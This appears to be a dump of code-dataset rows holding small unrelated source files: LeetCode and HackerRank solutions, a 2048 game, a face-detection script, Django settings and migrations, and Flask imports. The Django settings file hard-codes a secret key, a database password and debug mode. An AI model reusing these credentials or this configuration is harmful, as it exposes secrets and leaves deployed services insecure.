blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dad32eae32751df732af523771da18a910812cc1 | dba1c22426113d32bda17a3d1f1282686649e34d | /week 2/ex_4.py | 0783b1cd9993665035e5cf68fbabb657f0fdb9bb | [] | no_license | gerritvanos/ALDS | 67ab1617c5a6ffceb6e2f682fa87fe5e318fe2cd | 2c4d0d46fc12ab615e347ebc1259e669f86794a4 | refs/heads/master | 2020-04-06T09:46:18.094848 | 2018-12-14T15:04:00 | 2018-12-14T15:04:00 | 157,355,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | def my_bin(n):
assert n>=0
if n==1:
return "1"
elif n%2 ==1:
return my_bin((n-1) / 2) + "1"
elif n%2 ==0:
return my_bin(n/2)+"0"
def test_my_bin():
print("100 in binary with my_bin: 0b",my_bin(100))
print("100 in binary with python function ",bin(100))
print("220 in binary with my_bin: 0b",my_bin(220))
print("220 in binary with python function ",bin(220))
test_my_bin() | [
"gerrit.vanos@student.hu.nl"
] | gerrit.vanos@student.hu.nl |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s662353627.py | 14c606722f6e0774d8c3d2625e893ec714620f0c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
b = list(map(int , input().split()))
def f(c):
    """Scan from the right for an index where the value equals its 1-based
    position.

    Returns (value, list with that element removed) for the right-most match,
    or (-1, c) unchanged when no position satisfies c[i] == i + 1.
    """
    for idx in range(len(c) - 1, -1, -1):
        if c[idx] == idx + 1:
            remaining = c[:idx] + c[idx + 1:]
            return (c[idx], remaining)
    return (-1, c)
ans = []
for i in range(n):
(a, b) = f(b)
if a == -1:
print(-1)
exit()
ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
164c530575bcfc51130c5427d7b4d93caa3a5a7a | 3d48586ad6c28755933ab1da478bf003ad56fdde | /template.py | a551620cc8fc15c742128426747f0f92c78c85c9 | [] | no_license | hareshkm999/DVC_Project | 4db3941e67e443e7bc461515611a883f6a1b3182 | b6e18a24f7a5f33ab378f549d6dcf71938954660 | refs/heads/main | 2023-07-25T04:23:08.673414 | 2021-09-07T08:52:08 | 2021-09-07T08:52:08 | 403,842,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 439 | py | import os
# Scaffold a DVC-style project layout: directory tree plus empty placeholder
# files. Safe to re-run (directories are created with exist_ok, files are
# simply truncated back to empty).
directories = (
    os.path.join("data", "raw"),
    os.path.join("data", "processed"),
    "notebooks",
    "saved_models",
    "src",
)

for directory in directories:
    os.makedirs(directory, exist_ok=True)
    # Empty .gitkeep so git tracks the otherwise-empty directory.
    open(os.path.join(directory, ".gitkeep"), "w").close()

placeholder_files = (
    "dvc.yaml",
    "params.yaml",
    ".gitignore",
    os.path.join("src", "__init__.py"),
)

for placeholder in placeholder_files:
    # Create (or truncate) each empty placeholder file.
    open(placeholder, "w").close()
| [
"hareshkm999@gmail.com"
] | hareshkm999@gmail.com |
863d4753ef33244930f18c68a24c117304b45e7f | b07b4bc0e95bf1595b9b9507e2a6389535afe7b9 | /system.py | 1be287d4bbdfd167b4ede7ced04339184aba49c6 | [] | no_license | SuryanshAgarwal/Python_learning | 2661aa9a05284242d98d47c24c020a54b485c7e0 | 840da13d4e1ac5157c77db26eee5e23f2383273c | refs/heads/master | 2020-04-23T02:12:31.295554 | 2019-02-15T09:33:43 | 2019-02-15T09:33:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import sys
print(sys.argv[0])
print(sys.byteorder)
print(sys.float_info.epsilon)
class ABC:
    """Tiny demo class used by the sys-inspection script below."""

    # Class attributes shared by all instances.
    x = 89
    t = True

    # BUG FIX: the original `def __init__():` was missing `self`, so
    # instantiating ABC() raised TypeError (which is presumably why the
    # `p1 = ABC()` line further down was commented out).
    def __init__(self):
        pass
# p1 = ABC()
print(sys.maxsize)
print(sys.getrecursionlimit()) | [
"noreply@github.com"
] | SuryanshAgarwal.noreply@github.com |
86a219a27e1a59ef89f8e50e08819b7ebb8dbc45 | 47c8165b725636298e001a1d6c2fc3c0c2136952 | /2048/cli.py | 4a19f68cec4c682338b36348de47dfdbba452920 | [
"MIT"
] | permissive | S8A/2048 | 3eaf4a577ab05653dcb39bccfbafef910c6248fa | f0ed44e717369c1e3b89e989075d0d15b7928dc3 | refs/heads/master | 2022-09-28T18:26:41.284679 | 2020-05-26T22:31:03 | 2020-05-26T22:31:03 | 266,127,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | import sys
from .board import GameBoard
def main(size, win):
    """Run the interactive 2048 loop until the player wins, loses, or exits.

    size -- board dimension passed to GameBoard
    win  -- target tile value that ends the game with a win
    """
    game = GameBoard(size, win)
    # Each command maps to the bound method that performs it; 'exit' maps
    # to None, which (being falsy) terminates the loop below.
    actions = {
        'l': game.shift_left,
        'r': game.shift_right,
        'u': game.shift_up,
        'd': game.shift_down,
        'undo': game.undo,
        'exit': None,
    }
    while True:
        print_gameboard(game)
        if game.won():
            print('You won!')
            break
        if game.lost():
            print('You lost. Try again.')
            break
        action = input_action(actions)
        if not action:
            break
        action()
    print()
def print_gameboard(gb: GameBoard):
    """Render the board header (target, score, moves) and the grid to stdout.

    Empty cells (value 0) print as blanks; occupied cells are left-aligned
    in a fixed-width column.
    """
    print(f'..:: {gb.win} GAME ::..')
    print(f'Score: {gb.get_score()}')
    print(f'Moves: {gb.moves}')
    print()

    # Horizontal rule between rows: one six-dash segment per column.
    rule = '+'.join('-'*6 for _ in range(gb.size))
    print(rule)
    for row in gb.board:
        rendered = [' '*6 if cell == 0 else f' {cell :<4} ' for cell in row]
        print('|'.join(rendered))
        print(rule)
    print()
def input_action(actions):
    """Prompt until the user types a known command; return its mapped value.

    The returned value is whatever `actions` maps the command to (a bound
    board method, or None for 'exit').
    """
    while True:
        choice = input('Shift board (l/r/u/d) or do action (undo/exit): ')
        choice = choice.strip().lower()
        if choice in actions:
            return actions[choice]
        print('ERROR: Invalid action. Try again.')
| [
"samuelochoap@gmail.com"
] | samuelochoap@gmail.com |
957f02d9987f5e849254ef1bc6109b145e5abde9 | 56345c289644498f96d79dcdbee0476ea4342daa | /lc206.py | bde40f1320931e30c967fe1f94f68470d155c0e8 | [] | no_license | boyima/Leetcode | 8023dd39d06bcb3ebb4c35c45daa193c78ce2bfe | 0802822e1cbf2ab45931d31017dbd8167f3466cc | refs/heads/master | 2020-12-13T06:35:00.834628 | 2019-11-05T22:27:50 | 2019-11-05T22:27:50 | 47,539,183 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | #Reverse a singly linked list.
#
# Example:
#
#
#Input: 1->2->3->4->5->NULL
#Output: 5->4->3->2->1->NULL
#
#
# Follow up:
#
# A linked list can be reversed either iteratively or recursively. Could you implement both?
# Related Topics Linked List
#leetcode submit region begin(Prohibit modification and deletion)
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def reverseList(self, head):
        """
        Reverse a singly linked list in place and return the new head.
        :type head: ListNode
        :rtype: ListNode
        """
        if head is None:
            return None
        # Standard pointer reversal: walk the list once, flipping each
        # node's `next` to point at its predecessor.
        previous = None
        node = head
        while node is not None:
            successor = node.next
            node.next = previous
            previous = node
            node = successor
        return previous
#leetcode submit region end(Prohibit modification and deletion)
| [
"noreply@github.com"
] | boyima.noreply@github.com |
1882eeadfefbc7df490631970ee7297b02479cbf | 89ebbee6dc64570312e1b5957f6ab0c70d5671ef | /surplus_transaction/apps/goods/migrations/0015_auto_20200121_1823.py | e9939ee2baa8e01a1b7393e6c155174053b52b30 | [] | no_license | mengli1/django-secondhand-shop | 2439b35741522f7117fde279d68b6242e0848f89 | 6832b95b78d9adf359a28ee0a9c23d7aba1d9705 | refs/heads/master | 2020-12-21T14:59:29.775433 | 2020-05-06T11:59:06 | 2020-05-06T11:59:06 | 236,467,154 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 741 | py | # Generated by Django 2.2.5 on 2020-01-21 10:23
import ckeditor_uploader.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration for the `goods` app: make Goods.detail a
    rich-text upload field and re-declare the Goods.fineness choice set."""
    dependencies = [
        ('goods', '0014_auto_20200121_1428'),
    ]
    operations = [
        # Rich-text product description with image-upload support
        # (django-ckeditor's uploading field variant).
        migrations.AlterField(
            model_name='goods',
            name='detail',
            field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, verbose_name='商品详情'),
        ),
        # Condition grade choices; labels are Chinese "X成新" percentages
        # (0 = brand new ... 3 = 70%-new or below), default brand new.
        migrations.AlterField(
            model_name='goods',
            name='fineness',
            field=models.SmallIntegerField(choices=[(3, '7成新及以下'), (2, '8成新'), (1, '9成新'), (0, '全新')], default=0, verbose_name='商品成色'),
        ),
    ]
| [
"2761006009@qq.com"
] | 2761006009@qq.com |
ae118bfafb32884ac2572c4ed92fbffe0567ffd2 | 33f8305e37cb5ed1790cfb92ff22d2ad434b1f3e | /GergoPay/settings.py | dc4e38be3cc4788bf9fad7d0466f13bcf274c6e3 | [] | no_license | Shrey1307/GergpPay | 2d95efa6d23ced6dad8f9670c390fe7aed6a9cdd | d3b4a2706d5a5e0771fc85ccb151b5a1d6b0a100 | refs/heads/master | 2023-01-31T13:11:22.846111 | 2018-10-04T07:21:08 | 2018-10-04T07:21:08 | 151,533,250 | 0 | 0 | null | 2023-01-11T18:56:39 | 2018-10-04T07:18:03 | HTML | UTF-8 | Python | false | false | 3,716 | py | """
Django settings for GergoPay project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '45c0^+i*fp$5)8jhr+v%0lilul@ntl2t68u1nn@-b-aq0aa@-@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pay',
'django_tables2',
'bootstrap3',
'django_filters',
'bootstrapform',
'graphos',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'GergoPay.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'GergoPay.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
"""
# PostgreSQL connection used by this Django project (the sqlite default
# above is kept only as a commented-out reference).
# NOTE(review): NAME/USER/PASSWORD are hard-coded in source control --
# they should be moved to environment variables before deployment.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'admin',
        'USER': 'admin123',
        'PASSWORD': 'Inno@123!',
        'HOST': 'localhost',
        'PORT': '',  # empty string -> driver default port (5432)
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images/')
LOGIN_REDIRECT_URL = '/test'
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| [
"shrey.saxena@thinqmagic.com"
] | shrey.saxena@thinqmagic.com |
7249037b709c0aa0c8542843b0645547e32df6f8 | a08492c20c6bda0282170fee569f3cd199876ec7 | /scr/return_directories.py | 6e090bc090e123ede17864f4f68be58e20f41193 | [] | no_license | GregoryREvans/evans | a7744011ccd2395e15d325092e85a31379717e6d | 7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6 | refs/heads/master | 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 | Python | UTF-8 | Python | false | false | 425 | py | import pathlib
def return_directories(
    p="/Users/gregoryevans/Scores",
    ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
    """Return the score directories under *p*, sorted by name.

    Skips plain files and any directory whose name appears in *ignores*.

    BUG FIX: the original ended with the bare expression `returns` instead
    of `return returns`, so the function always returned None.
    """
    build_path = pathlib.Path(p)
    returns = []
    for score in sorted(build_path.iterdir()):
        if not score.is_dir():
            continue
        if score.name in ignores:
            continue
        returns.append(score)
    return returns
| [
"gregoryrowlandevans@gmail.com"
] | gregoryrowlandevans@gmail.com |
77a5c19e356acc87f9ba6849f393fe5f21034d79 | 4dfb30e4c2790243ee3970e3642b5b453ff10d3d | /30daysofcode/15_linkedlist.py | 8ac5706331d2fc9f92969a52ba65d6f8fea48e34 | [] | no_license | dappledore/hackerrank | b2237ca0031d6687f8ba18d378967f235e8a91ae | f9ef0777afc8347b121b39326c1a7e4c209c394b | refs/heads/master | 2022-12-17T01:47:14.499012 | 2020-09-25T00:19:09 | 2020-09-25T00:19:09 | 286,184,937 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | # https://www.hackerrank.com/challenges/30-linked-list/problem
class Node:
    """One element of a singly linked list."""

    def __init__(self, data):
        # `next` starts unlinked; it is wired up when the node is inserted.
        self.next = None
        self.data = data
class Solution:
    """Builds and prints a singly linked list with O(1) tail appends."""

    # Cached pointer to the last node so insert() avoids an O(n) walk.
    tail = None

    def display(self, head):
        """Print each node's data on one line, space-separated."""
        node = head
        while node:
            print(node.data, end=' ')
            node = node.next

    def insert(self, head, data):
        """Append *data* after the cached tail; return the (possibly new) head."""
        if head:
            self.tail.next = Node(data)
            self.tail = self.tail.next
        else:
            # Empty list: the new node is both head and tail.
            head = Node(data)
            self.tail = head
        return head
mylist = Solution()
T = int(input())
head = None
for i in range(T):
data = int(input())
head = mylist.insert(head, data)
mylist.display(head)
| [
"dappledore@gmail.com"
] | dappledore@gmail.com |
bcdec480012510b7512902706b6a8705642cd22e | ca13c0a7f9a8f1d49fd1014c3b186fe24a31baf9 | /20-Course selection I.py | f24ac0e8cba59f81f813bd35623956d42e6e3142 | [] | no_license | ruinanzhang/Leetcode_Solution | 43a5835a96e31e8282a9a2dc23eec360ba3368c9 | d490af6874476d32c9a6c0270c596b2e415f9808 | refs/heads/master | 2023-07-31T04:44:10.717525 | 2021-09-18T01:26:47 | 2021-09-18T01:26:47 | 256,404,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | # Tag: Graph
# 207. Course Schedule (LeetCode)
# -----------------------------------------------------------------------------------
# Description:
# There are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.
# Some courses may have prerequisites, for example to take course 0 you have to first
# take course 1, which is expressed as a pair: [0,1]
# Given the total number of courses and a list of prerequisite pairs,
# is it possible for you to finish all courses?
# -----------------------------------------------------------------------------------
# Assumptions:
# The input prerequisites is a graph represented by a list of edges,
# not adjacency matrices. Read more about how a graph is represented.
# You may assume that there are no duplicate edges in the input prerequisites.
# 1 <= numCourses <= 10^5
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# 思路:Topological Sort
# 1. Empty List L, NoIndegree Set S
# 2. Compute Indegree Adj list and OutDegree AdjList
# 3. 找到没有indegree的node,放到NoIndegree Set S里
# 4. While Set S is not emopty:
# 5. remove node n from S
# 6. add n to list L
# 7. For neighbors(nei m) in the OutDegree Adjlist of node n:
# 8. Remove node n from nei m's Indegree Adjlist
# 9. if nei m's Indegree list is empty:
# 10. add m to set S
# 11. If List L's 的size 比 number of nodes 小, 说明有node不能topological sort
# 12.Return False then
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
class Solution:
    def canFinish(self, numCourses: int, prerequisites: 'List[List[int]]') -> bool:
        """Return True iff every course can be scheduled (no prerequisite cycle).

        Kahn's algorithm: repeatedly take a course whose prerequisites are all
        satisfied; the graph is acyclic exactly when every course gets taken.

        BUG FIX: the annotation is now a string -- `typing.List` is never
        imported in this file, so the original annotation raised NameError
        when the class body was executed.
        """
        # incoming[i]: prerequisites still blocking course i
        # outgoing[j]: courses partially unblocked by finishing course j
        incoming = {x: [] for x in range(numCourses)}
        outgoing = {x: [] for x in range(numCourses)}
        for course, prereq in prerequisites:
            incoming[course].append(prereq)
            outgoing[prereq].append(course)

        # Seed with every course that has no prerequisites at all.
        ready = [x for x in range(numCourses) if not incoming[x]]

        taken = []
        while ready:
            course = ready.pop()
            taken.append(course)
            for follower in outgoing[course]:
                incoming[follower].remove(course)
                if not incoming[follower]:
                    ready.append(follower)

        # All courses scheduled <=> the prerequisite graph has no cycle.
        return len(taken) == numCourses
# Alternative DFS solution:
def canFinish(self, numCourses, prerequisites):
    """Alternative DFS cycle-detection solution to Course Schedule.

    visit states: 0 = unvisited, -1 = on the active DFS path, 1 = proven safe.
    Returns True iff the prerequisite graph contains no cycle.

    BUG FIX: replaced Python-2-only `xrange` with `range`; the original
    raised NameError on Python 3.
    """
    graph = [[] for _ in range(numCourses)]
    visit = [0 for _ in range(numCourses)]
    for x, y in prerequisites:
        graph[x].append(y)

    def dfs(i):
        if visit[i] == -1:
            # Back edge: `i` is already on the current path -> cycle.
            return False
        if visit[i] == 1:
            # Subtree rooted at `i` was already verified acyclic.
            return True
        visit[i] = -1
        for j in graph[i]:
            if not dfs(j):
                return False
        visit[i] = 1
        return True

    for i in range(numCourses):
        if not dfs(i):
            return False
    return True
| [
"rz2363@columbia.edu"
] | rz2363@columbia.edu |
c37631b47a0b6af83326403ee829649b804d3d58 | f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485 | /backend/test_23115/wsgi.py | d1ce4e85722e439b0c888cf764cf31d84dc3e907 | [] | no_license | crowdbotics-apps/test-23115 | f6fd5b199d5586aed78f0a9844062c83ee0ab574 | c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82 | refs/heads/master | 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
16e7a75e20aad03573da75c844a7329f52d68fe5 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/surface/container/node_pools/__init__.py | 245eda35f54a0e9605d06f2abed352e8ec9f670c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 1,982 | py | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
| [
"jonathang132298@gmail.com"
] | jonathang132298@gmail.com |
ecced9539d46bf6fbd7b966823f1c2751c384a84 | b2e3d6ac8b551cefcd0708ddadd1674fc717f1c3 | /behave.py | 5d55bb8b36726ea28197e6b0f78bbdb2928ca610 | [] | no_license | adsmaicon/teste_simples_pytest | 749cef0ab35e52bdd84fb704a3a297fa58f50e94 | 4c9ef0ee4e815822deeed78a2df0681633b7b0eb | refs/heads/master | 2022-12-07T08:21:31.945846 | 2020-09-03T23:30:18 | 2020-09-03T23:30:18 | 292,157,572 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | #!/usr/bin/env python3.8
import sys
from behave.__main__ import main as behave_main
if __name__ == "__main__":
sys.exit(behave_main())
| [
"m.carvalho@vhsys.com.br"
] | m.carvalho@vhsys.com.br |
6992636345088c5ff23b300d65f558ff32af6e1c | 3f92f2106587a44bb1d8a756246e942931138526 | /ENV/bin/trial | ed0290921f9e1129abac1ff5f11585f624ef2c1f | [
"Apache-2.0"
] | permissive | jacobKKK/IMnight2018_Backend | 36f2c2c86f202a9410d632fca9e374939f338e1e | b5673b1addb2124b79dd653814b7f5773a2921b2 | refs/heads/master | 2021-04-27T18:04:45.362862 | 2018-02-21T12:21:38 | 2018-02-21T12:21:38 | 119,137,846 | 0 | 0 | null | 2018-01-27T06:01:41 | 2018-01-27T06:01:40 | null | UTF-8 | Python | false | false | 265 | #!/Users/YuChih/Project/IMnight2018_Backend/ENV/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from twisted.scripts.trial import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"secret104278@gmail.com"
] | secret104278@gmail.com | |
9105b9a44be0ecd8628f5443fb4af77f70ea6030 | 1958bfbd56a0540d9e56a8a8e017817ce2009571 | /test.py | 290615a778a192a8b174396a98d2f0baad3aab2b | [] | no_license | Heddy147/ias | d020c234519652df1ace410f90b8a87f63a3daf2 | d371a0ce4c9a71243a1eeab93bc57dfaf23b5f91 | refs/heads/master | 2020-12-24T19:28:42.233008 | 2016-05-30T14:12:01 | 2016-05-30T14:12:01 | 59,740,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import json
def sort_erg(item):
    """Sort key for result dicts: the entry's "zeit" (time) value."""
    zeit = item["zeit"]
    return zeit
ergebnisse = [
{
"id": 1,
"zeit": "561087"
}, {
"id": 2,
"zeit": "531874"
}, {
"id": 3,
"zeit": "561187"
}, {
"id": 4,
"zeit": "547954"
}
]
sorted_erg = sorted(ergebnisse, key=sort_erg)
print(sorted_erg) | [
"dominik.hendrix@hotmail.de"
] | dominik.hendrix@hotmail.de |
9db2da75b2e59f9d5cadb2023d453c5130274276 | 6d77d68f53e1fa0535154c6e43d19d393d06e14b | /face detect.py | 1dbe8fb1073c295a3959714a38663ea84596399e | [] | no_license | spragad/face_detection_yolo | 7728129608925b9e16457832f6484dd4d18129c4 | 6d34a0e8eacf65e0d0ec647671f2255fe6cde057 | refs/heads/main | 2023-02-02T08:09:15.880450 | 2020-12-17T00:41:12 | 2020-12-17T00:41:12 | 322,130,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,107 | py |
import os
print(os.getcwd())
os.chdir(".../faced-master/")
import cv2
from faced import FaceDetector
from faced.utils import annotate_image
from time import process_time
#___________________________________________________For Image______________________________________________________
face_detector = FaceDetector()
img = cv2.imread("face_det.jpg")
rgb_img = cv2.cvtColor(img.copy(), cv2.COLOR_BGR2RGB)
# Receives RGB numpy image (HxWxC) and
# returns (x_center, y_center, width, height, prob) tuples.
bboxes = face_detector.predict(rgb_img, 0.7)
# Use this utils function to annotate the image.
ann_img = annotate_image(img, bboxes)
#save img
cv2.imwrite('face_detd.jpg', ann_img)
# Show the image
cv2.imshow('Result',ann_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
#____________________________________________________For Video_______________________________________________________
video='Vid.mp4'
cap = cv2.VideoCapture(video)
face_detector = FaceDetector()
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
size = (frame_width, frame_height)
result = cv2.VideoWriter('Face_det_out.mp4',cv2.VideoWriter_fourcc(*'XVID'), 15, size)
pro_time=[]
while(True):
t1_start = process_time()
ret, frame = cap.read()
if ret== True:
rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# Receives RGB numpy image (HxWxC) and
# returns (x_center, y_center, width, height, prob) tuples.
bboxes = face_detector.predict(rgb_img, 0.7)
# Use this utils function to annotate the image.
ann_img = annotate_image(frame, bboxes)
# Save video
result.write(ann_img)
# Show the image
cv2.imshow('Result',ann_img)
# quit
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
t1_stop = process_time()
pro_time.append(t1_stop-t1_start)
cap.release()
result.release()
cv2.destroyAllWindows()
print("Average Procesing time per frame: ",sum(pro_time)/len(pro_time))
| [
"noreply@github.com"
] | spragad.noreply@github.com |
0c8caba54a6f839b8090f86a54ad68d69011443c | b77d5904a03a6f87649042d46e58be36f7caf645 | /flaskblogg/routes.py | fa0510ee88bc92ea48f9d39e12f90d24b63d7827 | [] | no_license | ezquantum/Flask_Blog_V1 | 64099241a7ec14758db7cc062423769bebe5ff9a | ab45ee275b8e57d9d4b4b600f10a63c2bb75e11b | refs/heads/main | 2022-12-29T08:49:00.489137 | 2020-10-13T03:44:54 | 2020-10-13T03:44:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,181 | py | import os
from urllib.request import urlopen
from flask import request, _request_ctx_stack, abort, Flask, jsonify, render_template, url_for, flash, session, redirect, g
from six.moves.urllib.parse import urlencode
from authlib.integrations.flask_client import OAuth
from dotenv import load_dotenv, find_dotenv
from werkzeug.exceptions import HTTPException
from os import environ as env
from flaskblogg import app
import json
from functools import wraps
from flaskblogg.forms import RegistrationForm, LoginForm, PostForm
from jose import jwt
from flaskblogg.models import User, Post, db, db_drop_and_create_all
from .auth import auth
